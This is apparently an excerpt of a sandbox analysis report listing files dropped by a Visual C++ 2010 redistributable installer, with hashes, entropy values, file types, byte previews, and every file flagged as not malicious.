SHA-512:	3CAEB21177685B9054B64DEC997371C4193458FF8607BCE67E4FBE72C4AF0E6808D344DD0D59D3D0F5CE00E4C2B8A4FFCA0F7D9352B0014B9259D76D7F03D404
Malicious:	false
Preview:	..............h.......(....... ....................................................................................................G.F..........................................H.GG.FX.V..............................).(.........G.F.........i.g..................+.*%.$5.4...............n.ln.l{.y.................. .......................u.s............................................................................................................................................................~.~...~.~.................................................................................................................................................................................................................................................................................................................................................G.......................................G..........

C:\4863269369430a9b27\Graphics\Rotate8.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:	dropped
Size (bytes):	894
Entropy (8bit):	2.513882730304912
Encrypted:	false
SSDEEP:	12:pPv1OuTerb53mpOBfXjQuZfKWpIXE1D6HRp5c:91OEerb53eUQsflpIP4
MD5:	D1C53003264DCE4EFFAF462C807E2D96
SHA1:	92562AD5876A5D0CB35E2D6736B635CB5F5A91D9
SHA-256:	5FB03593071A99C7B3803FE8424520B8B548B031D02F2A86E8F5412AC519723C
SHA-512:	C34F8C05A50DC0DE644D1F9D97696CDB0A1961C7C7E412EB3DF2FD57BBD34199CF802962CA6A4B5445A317D9C7875E86E8E62F6C1DF8CC3415AFC0BD26E285BD
Malicious:	false
Preview:	..............h.......(....... ....................................................................................................g.e..........................................g.eg.ew.u..............................F.E.........g.e..............................E.DA.@P.O..........................................:.9......................................................................................&.%.........................................+.* ..+.*..................................................................................................................................................{.{.......................................................................................~.~...{.{..............................................................................................................................................G.......................................G..........

C:\4863269369430a9b27\Graphics\Save.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	4.824239610266714
Encrypted:	false
SSDEEP:	24:Br5ckw0Pce/WPv42lPpJ2/BatY9Y4ollEKeKzn:h6kPccWPQS2UtEYFEKeu
MD5:	7D62E82D960A938C98DA02B1D5201BD5
SHA1:	194E96B0440BF8631887E5E9D3CC485F8E90FBF5
SHA-256:	AE041C8764F56FD89277B34982145D16FC59A4754D261C861B19371C3271C6E5
SHA-512:	AB06B2605F0C1F6B71EF69563C0C977D06C6EA84D58EF7F2BAECBA566D6037D1458C2B58E6BFD70DDEF47DCCBDEA6D9C2F2E46DEA67EA9E92457F754D7042F67
Malicious:	false
Preview:	............ .h.......(....... ..... .....@........................................................................................klT.de..UV..RS..OP..MM..JJ..GG..DD..AA.x;<.x;<.r99.n67..........kl......D$.G2!...............VMH..>3..=6..91.r99..........op.........q[K.G<4..xh...........s..A5..B<..=5.x;<..........uv...........q[K.....G<4..........tg..KC..ID..B<.}>>..........{\|.............q[K.q[K.q[K.q[K.vbR.}j[..VT..OL..ID..AA...............................yz..qr..kl..]\..VT..PL..DD.....................c`..^V..XK..R?..M4..G(..A...;...]\..VT..GG................fg.................................;...]\..JJ................mn..................................A...gg..MM................vw..................................G(..qr..OP..................................................M4..yz..RS..................................................R?.g33..UV....................................................XK..XY..XY..................................

C:\4863269369430a9b27\Graphics\Setup.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 12 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:	dropped
Size (bytes):	36710
Entropy (8bit):	5.3785085024370805
Encrypted:	false
SSDEEP:	384:IXcWz9GU46B4riEzg8CKcqxkk63gBh6wSphnBcI/ObMFp2rOebgcjTQcho:IMWQ2Bf8qqxMQP8pc4XessTJo
MD5:	3D25D679E0FF0B8C94273DCD8B07049D
SHA1:	A517FC5E96BC68A02A44093673EE7E076AD57308
SHA-256:	288E9AD8F0201E45BC187839F15ACA79D6B9F76A7D3C9274C80F5D4A4C219C0F
SHA-512:	3BDE668004CA7E28390862D0AE9903C756C16255BDBB3F7E73A5B093CE6A57A3165D6797B0A643B254493149231ACA7F7F03E0AF15A0CBE28AFF02F0071EC255
Malicious:	false
Preview:	..............(...............h...............h...V... .............. .............. ..........N...00......h...."..00..........^)..00...........8........ .h....T.. .... ......Y..00.... ..%...i..(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.\|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..\|u..xq..\|r..\|u..rx..zy..\|w.}.y...q...d...y...{......S...]..d..i..r..\|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l..........................................................................................................................................................................................................

C:\4863269369430a9b27\Graphics\SysReqMet.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	5.038533294442847
Encrypted:	false
SSDEEP:	24:MuoBP5lj49s9NRDe4LakKcTM8cv99uGzMN:MlFH3/Ri4LaN3q
MD5:	661CBD315E9B23BA1CA19EDAB978F478
SHA1:	605685C25D486C89F872296583E1DC2F20465A2B
SHA-256:	8BFC77C6D0F27F3D0625A884E0714698ACC0094A92ADCB6DE46990735AE8F14D
SHA-512:	802CC019F07FD3B78FCEFDC8404B3BEB5D17BFC31BDED90D42325A138762CC9F9EBFD1B170EC4BBCCCF9B99773BD6C8916F2C799C54B22FF6D5EDD9F388A67C6
Malicious:	false
Preview:	............ .h.......(....... ..... .....@..........................................M...........S...........................................q.......................z...................................;........q.c.P.K.\|.}............C....................................;.!......................................................Ry,.*w..!.............-.........................................6b..8v................ .+.@............#....................4u..;a..............H.<.........=.C.............................&y..x.e.................$}......................................<.).........\.A............}..................................[.R.}.n.Z.C.y.Y.k.L............. q..............................t.s............r...k.........]{G..............................................y.`.z.h.a.N.e.P...............................................~.q._.J...............................8....................t.p..................?..................................................

C:\4863269369430a9b27\Graphics\SysReqNotMet.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:	dropped
Size (bytes):	1150
Entropy (8bit):	5.854644771288791
Encrypted:	false
SSDEEP:	24:u2iVNINssNQhYMEyfCHWZZ7rTRrbWjcyuE:uDW871fdZ1lbWjME
MD5:	EE2C05CC9D14C29F586D40EB90C610A9
SHA1:	E571D82E81BD61B8FE4C9ECD08869A07918AC00B
SHA-256:	3C9C71950857DDB82BAAB83ED70C496DEE8F20F3BC3216583DC1DDDA68AEFC73
SHA-512:	0F38FE9C97F2518186D5147D2C4A786B352FCECA234410A94CC9D120974FC4BE873E39956E10374DA6E8E546AEA5689E7FA0BEED025687547C430E6CEFFABFFB
Malicious:	false
Preview:	............ .h.......(....... ..... .....@....................................../..F..........!....n....d..................................;.............,+..AB..UV..XZ...1.....S......................U.....................EE..\[..rr......NP.....^..............<s.....................!.$)..AC..jj..ww..{{..57.....4........01.................H..........N?8;..[[..ba..`_..TU....L.......bj]^..QP.........:..........)N#&..>=..GG..HI..IJ..EE..!#......24..mm..hh..,.............+N........)(..-.....{-...-,........ SPS..zy..qr....qq......0NCE..33..%%........ZJ...."$..0/../1....?qRU............W}..)A]^..rr..qq..Y[...._z........CE..RQ..AC....8`79.........SU..ab......\|\|..ef....ey...........QZ[..ZZ..=?.....(...d....................pr.....H............IK..jj..fg..,..........]_..................[y.......(..:VQS..{z..ut..ab....'H...........?................\|\|..ef..jk..................$%d....................W....................................*,n.............................HI......................WY

C:\4863269369430a9b27\Graphics\stop.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
Category:	dropped
Size (bytes):	10134
Entropy (8bit):	6.016582854640062
Encrypted:	false
SSDEEP:	96:uC1kqWje1S/f1AXa0w+2ZM4xD02EuZkULqcA0zjrpthQ2Ngms9+LmODclhpjdfLt:JkqAFqroMS9lD9Ngr9+m7bxpXHT5ToYR
MD5:	5DFA8D3ABCF4962D9EC41CFC7C0F75E3
SHA1:	4196B0878C6C66B6FA260AB765A0E79F7AEC0D24
SHA-256:	B499E1B21091B539D4906E45B6FDF490D5445256B72871AECE2F5B2562C11793
SHA-512:	69A13D4348384F134BA93C9A846C6760B342E3A7A2E9DF9C7062088105AC0B77B8A524F179EFB1724C0CE168E01BA8BB46F2D6FAE39CABE32CAB9A34FC293E4A
Malicious:	false
Preview:	...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@......................................................................................................wwx...........w....w.........x....x.........x.y.......................p..............x.........q.......p.........q.................xy...........q.......................p.............y..................x.y..............y.y.............yyy.........S........x..........yy.............x.yyyx......................Q.8.........x..............y....qy.p...y.....x.....p........y....9.....y....yy..yx.......y..yyyw..p.....y.yyyyy................x.p........y.yy..........x...x............x.................wwx.....................?...................................................................................................?............(....... ..................................................................................................ww.....w..........xx..x........x....p........xy

C:\4863269369430a9b27\Graphics\warn.ico

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
Category:	dropped
Size (bytes):	10134
Entropy (8bit):	4.3821301214809045
Encrypted:	false
SSDEEP:	192:USAk9ODMuYKFfmiMyT4dvsZQl+g8DnPUmXtDV3EgTtc:r9wM7pyEBlcgssmXpVUgJc
MD5:	B2B1D79591FCA103959806A4BF27D036
SHA1:	481FD13A0B58299C41B3E705CB085C533038CAF5
SHA-256:	FE4D06C318701BF0842D4B87D1BAD284C553BAF7A40987A7451338099D840A11
SHA-512:	5FE232415A39E0055ABB5250B120CCDCD565AB102AA602A3083D4A4705AC6775D45E1EF0C2B787B3252232E9D4673FC3A77AAB19EC79A3FF8B13C4D7094530D2
Malicious:	false
Preview:	...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@................................................................................................................................................................wwwww.....wwww...................3333333333338...{....3s.....x...{....0G;.............0.;...7.........33....8.....{...33..............0....7...............8.......{....;.............0.;.............0...8...........4...............wu;.............ww;.............ww;?...........;ww;.............7w................................8.............{...................................................................................................................................................................?...?..................................................?...?.........(....... ........................................................................................................333333;...............8.........;........

C:\4863269369430a9b27\ParameterInfo.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	9742
Entropy (8bit):	3.5740021715676877
Encrypted:	false
SSDEEP:	192:gCu8VvHBZCR0inG2uls2G2XEEP2G2KQ6G2nCw+KFl:rj6G7GgeGPGYCrKFl
MD5:	322BEDAC27CE788189A7F346971656F8
SHA1:	4A5CF6DDB0BD8CB840BD4FA2BC6803D372B76F9B
SHA-256:	E315EB9940E066BE5FCBB6E7B78FB1EA37784A41E9FF4547EF7B50AD61848E54
SHA-512:	0F2E657B43B0B873C62FBB369D8AE4FED94239B05067EBB0ACD19C3A8F9B90CEB4B42D6091980202FF51C781F6BC518B079828049F17C8B9E6FA329A09394C11
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.0. . .x.6.4. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".1.0...0...4.0.2.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".U.s.e.r.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .

C:\4863269369430a9b27\Setup.exe

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	78152
Entropy (8bit):	6.011495501326699
Encrypted:	false
SSDEEP:	1536:OLNItbBL5NWiiES96exWZnqxMQP8ZOs0Js95q:OLNAB9NWTZ9Tc/gBW95q
MD5:	9A1141FBCEEB2E196AE1BA115FD4BEE6
SHA1:	922EACB654F091BC609F1B7F484292468D046BD1
SHA-256:	28563D908450EB7B7E9ED07A934E0D68135B5BB48E866E0A1C913BD776A44FEF
SHA-512:	B044600ACB16FC3BE991D8A6DBC75C2CA45D392E66A4D19EACAC4AEE282D2ADA0D411D832B76D25EF505CC542C7FA1FDB7098DA01F84034F798B08BAA4796168
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........MB.j.B.j.B.j.-...@.j.Yu..K.j.Yu..J.j.Yu..u.j.K...A.j.B.k...j.-...C.j.-...A.j.-...C.j.-...C.j.-...C.j.-...C.j.RichB.j.........PE..L....<_M.........."......f...........+............@..........................P............@...... ..................pu..x...Tp..<.......................H....@...... ................................(..@............................................text....e.......f.................. ..`.data................j..............@....rsrc................v..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\SetupEngine.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	808280
Entropy (8bit):	6.35945459148743
Encrypted:	false
SSDEEP:	24576:BS62AlYAxQ20z7TzuO5cEewDODLzNu/6K8RxvSU1Ccweb:BS62AlYAUTEpNuV8HvSU1Ccwe
MD5:	A030C6B93740CBAA232FFAA08CCD3396
SHA1:	6F7236A30308FBF02D88E228F0B5B5EC7F61D3EB
SHA-256:	0507720D52AE856BBF5FF3F01172A390B6C19517CB95514CD53F4A59859E8D63
SHA-512:	6787195B7E693744CE3B70C3B3EF04EAF81C39621E33D9F40B9C52F1A2C1D6094ECEAEBBC9B2906649351F5FC106EED085CEF71BB606A9DC7890EAFD200CFD42
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r..{!..{!..{!.H.!..{!.H.!..{!...!..{!...!..{!...!..{!...!=.{!...!..{!..z!.{!...!..{!...!..{!...!..{!...!..{!...!..{!Rich..{!................PE..L...-<_M.........."!.................................................................3....@.................................L...h....................>..X..............................................@............................................text...@........................... ..`.data..............................@....rsrc................j..............@..@.reloc..R............t..............@..B................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\SetupUi.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	295248
Entropy (8bit):	6.260043421233697
Encrypted:	false
SSDEEP:	3072:8DPVUK59JxkphBxIc7e+Fe2rNiw8EktfyTm0HqRi/M+sy1lQWc+pm5hxv5yhaQnt:AaygowjTMi/uVwHqKR
MD5:	C744EC120E54027C57318C4720B4D6BE
SHA1:	AB65FC4E68AD553520AF049129FAE4F88C7EFF74
SHA-256:	D1610B0A94A4DADC85EE32A7E5FFD6533EA42347D6F2D6871BEB03157B89A857
SHA-512:	6DCD0AB7B8671E17D1C15DB030EE5349AB3A123595C546019CF9391CE05F9F63806149C3EC2F2C71635CB811AB65AD47BCD7031E2EFF7A59059577E47DD600A7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c..X'.r.'.r.'.r.<f....r.<f..5.r.<f..N.r.....>.r.'.s...r.H...&.r.H...$.r.H...&.r.H...&.r.H...&.r.Rich'.r.........PE..L...'<_M.........."!................................................................y.....@..........................................P...............j..P....`.. ?..................................hz..@............................................text............................... ..`.data....Q.......4..................@....rsrc........P......................@..@.reloc...T...`...V..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\SetupUi.xsd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	30120
Entropy (8bit):	4.990211039591874
Encrypted:	false
SSDEEP:	768:hlzLm8eYhsPs05F8/ET/chT+cxcW8G2P4oeTMC:1wchT+cxcDm
MD5:	2FADD9E618EFF8175F2A6E8B95C0CACC
SHA1:	9AB1710A217D15B192188B19467932D947B0A4F8
SHA-256:	222211E8F512EDF97D78BC93E1F271C922D5E91FA899E092B4A096776A704093
SHA-512:	A3A934A8572FF9208D38CF381649BD83DE227C44B735489FD2A9DC5A636EAD9BB62459C9460EE53F61F0587A494877CD3A3C2611997BE563F3137F8236FFC4CA
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema".. xmlns="http://schemas.microsoft.com/SetupUI/2008/01/imui".. xmlns:imui="http://schemas.microsoft.com/SetupUI/2008/01/imui".. targetNamespace="http://schemas.microsoft.com/SetupUI/2008/01/imui".. elementFormDefault="qualified"..attributeFormDefault="unqualified"..>.... <xs:annotation>.. <xs:documentation>.. Copyright (c) Microsoft Corporation. All rights reserved... Schema for describing DevDiv "Setup UI Info".. </xs:documentation>.. </xs:annotation>.... <xs:element name="SetupUI">.. <xs:annotation>.. <xs:documentation>specifies UI dll, and lists of MSIs MSPs and EXEs</xs:documentation>.. </xs:annotation>.. <xs:complexType>.. <xs:sequence>.. <xs:choice>.. <xs:element ref="UI" minOccurs="1" maxOccurs="1"></xs:element>.. <xs:element ref="Strings" minOccurs="1" maxOccurs="1"></xs:element>..

C:\4863269369430a9b27\SplashScreen.bmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PC bitmap, Windows 3.x format, 200 x 200 x 8
Category:	dropped
Size (bytes):	41078
Entropy (8bit):	0.3169962482036715
Encrypted:	false
SSDEEP:	24:SgrNa0EfB4elU+jB+rQXJH4+Cs77hIfVHCv4ToqIzgPc8wcKHL+3:3pa0e4YjB5vAHk4E7zgPcDc53
MD5:	43B254D97B4FB6F9974AD3F935762C55
SHA1:	F94D150C94064893DAED0E5BBD348998CA9D4E62
SHA-256:	91A21EBA9F5E1674919EE3B36EFA99714CFB919491423D888CB56C0F25845969
SHA-512:	46527C88F0AED25D89833B9BE280F5E25FFCEAE6BC0653054C8B6D8EBE34EBA58818A0A02A72BD29279310186AC26D522BBF34191FBDE279A269FC9DA5840ACC
Malicious:	false
Preview:	BMv.......6...(...................@.......................{7...>...h?..D...N...K..........xE..._#..q..T...X...Q...[..._...c...j....>.!....f...v...r...."..v....0....... ..........4..I.........[...}..............j.............................................................................................................i......................@>1.......................................................o...u...u...z...z...~............................................................................................................................................................................{...~.................................................................................................................yw`......................................................................................................................................................//'...........................................

C:\4863269369430a9b27\Strings.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	14246
Entropy (8bit):	3.70170676934679
Encrypted:	false
SSDEEP:	384:VAZo71GHY3vqaqMnYfHHVXIHjfBHwnwXCa+F:VAB
MD5:	332ADF643747297B9BFA9527EAEFE084
SHA1:	670F933D778ECA39938A515A39106551185205E9
SHA-256:	E49545FEEAE22198728AD04236E31E02035AF7CC4D68E10CBECFFD08669CBECA
SHA-512:	BEA95CE35C4C37B4B2E36CC1E81FC297CC4A8E17B93F10423A02B015DDB593064541B5EB7003560FBEEE512ED52869A113A6FB439C1133AF01F884A0DB0344B0
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". ..... . . . . . . . . .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.S.t.r.i.n.g.s.>..... . . . .<.!.-.-. .R.e.f.l.e.c.t.i.v.e. .p.r.o.p.e.r.t.y. .p.a.g.e. .-.-.>..... . . . .<.I.D.S._.C.A.P.T.I.O.N._.F.O.R.M.A.T._.1.S.>.#.(.l.o.c...i.d.s._.c.a.p.t.i.o.n._.f.o.r.m.a.t._.1.s.).<./.I.D.S._.C.A.P.T.I.O.N._.F.O.R.M.A.T._.1.S.>..... . . . .<.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>.#.(.l.o.c...i.d.s._.i.s._.r.e.a.l.l.y._.c.a.n.c.e.l.).<./.I.D.S._.I.S._.R.E.A.L.L.Y._.C.A.N.C.E.L.>......... . . . .<.!.-.-. .S.y.s.t.e.m. .R.e.q.u.i.r.e.m.e.n.t.s. .p.a.g.e. .-.-.>..... . . . .<.S.Y.S.R.E.Q.P.A.G.E._.R.E.Q.U.I.R.E.D._.A.N.D._.A.V.A.I.L.A.B.L.E._.D.I.S.K._.S.P.A.C.E.>.#.(.l.o.c...s.y.s.r.e.q.

C:\4863269369430a9b27\UiInfo.xml

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	36342
Entropy (8bit):	3.0936879258457686
Encrypted:	false
SSDEEP:	768:S4UR0d5v1SguJQvFQXvDINJh6Fmhvk71sO0Nep3UL9Eu+dOtOcOdOjT5fuPkfuS:S4UR0d5v1QYQLIN/6Fmhvk71sO0Nep3q
MD5:	4F90FCEF3836F5FC49426AD9938A1C60
SHA1:	89EBA3B81982D5D5C457FFA7A7096284A10DE64A
SHA-256:	66A0299CE7EE12DD9FC2CFEAD3C3211E59BFB54D6C0627D044D44CEF6E70367B
SHA-512:	4CE2731C1D32D7CA3A4F644F4B3111F06223DE96C1E241FCC86F5FE665F4DB18C8A241DAE4E8A7E278D6AFBF91B235A2C3517A40D4D22D9866880E19A7221160
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.R.e.g.K.e.y.>..... . . . . . . . .<.R.e.g.V.a.l.u.e.N.a.m.e.>.U.I.L.a.n.g.u.a.g.e._.f.a.k.e.<./.R.e.g.V.a.l.u.e.N.a.m.e.>..... . . . . . .<./.L.C.I.D.H.i.n.t.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . .

C:\4863269369430a9b27\header.bmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PC bitmap, Windows 3.x format, 49 x 49 x 24
Category:	dropped
Size (bytes):	7308
Entropy (8bit):	3.7864255453272464
Encrypted:	false
SSDEEP:	48:9L9GXidTgX2bqxIS0SRosEYYgJSIf4pKTg7pDdEAeObh8EWu:R/Y2bq10Q/EY1sK8M4bb
MD5:	3AD1A8C3B96993BCDF45244BE2C00EEF
SHA1:	308F98E199F74A43D325115A8E7072D5F2C6202D
SHA-256:	133B86A4F1C67A159167489FDAEAB765BFA1050C23A7AE6D5C517188FB45F94A
SHA-512:	133442C4A65269F817675ADF01ADCF622E509AA7EC7583BCA8CD9A7EB6018D2AAB56066054F75657038EFB947CD3B3E5DC4FE7F0863C8B3B1770A8FA4FE2E658
Malicious:	false
Preview:	BM........6...(...1...1...........V.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\4863269369430a9b27\sqmapi.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144416
Entropy (8bit):	6.7404750879679485
Encrypted:	false
SSDEEP:	3072:uochw/MFWrJjKOMxRSepuBaqn/NlnBh2Lx0JVzx1wWobn1ek8F7HncO5hK9YSHlN:zDFB47UhXBh2yJ5HcOSSSHZqG
MD5:	3F0363B40376047EFF6A9B97D633B750
SHA1:	4EAF6650ECA5CE931EE771181B04263C536A948B
SHA-256:	BD6395A58F55A8B1F4063E813CE7438F695B9B086BB965D8AC44E7A97D35A93C
SHA-512:	537BE86E2F171E0B2B9F462AC7F62C4342BEB5D00B68451228F28677D26A525014758672466AD15ED1FD073BE38142DAE478DF67718908EAE9E6266359E1F9E8
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................................Rich...................PE..L....IE...........!.........$.....................l.........................@......R.....@.........................D.......$...d....................... (... ......P...8............................\..@.......t.......D............................text............................... ..`.data...............................@....rsrc...............................@..@.reloc....... ......................@..Ba.IE8....IEC....IEP....IEZ.....IEe....IEP...........msvcrt.dll.ADVAPI32.dll.ntdll.DLL.USER32.dll.KERNEL32.dll...............................................................................................................................................................................................................................................

C:\4863269369430a9b27\vc_red.cab

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe
File Type:	Microsoft Cabinet archive data, 4872031 bytes, 19 files
Category:	dropped
Size (bytes):	4877975
Entropy (8bit):	7.9998740597269355
Encrypted:	true
SSDEEP:	98304:kQ9QwhEDvkC7OSEEA8cWnjlaVjhx05JXW0UE2pSh1b38M:k7wWDvkGRFRrjla/a5JXD2grbMM
MD5:	C2B6838431748D42E247C574A191B2C2
SHA1:	F01C1A083C158D9470DA3919B461938560E90874
SHA-256:	387E94A26165E4E5F035D89F9C6589A8A9D223978ABBCC728B4C45C0115267A6
SHA-512:	5CF95C3CBE10A75360BC4D02840E196C919BCD2FD42BA86192D25D781D00E8019217A9C8829F51A2924D8C95BD48E06728A3530E3344000CAC79C4B0E7FAFF91
Malicious:	false
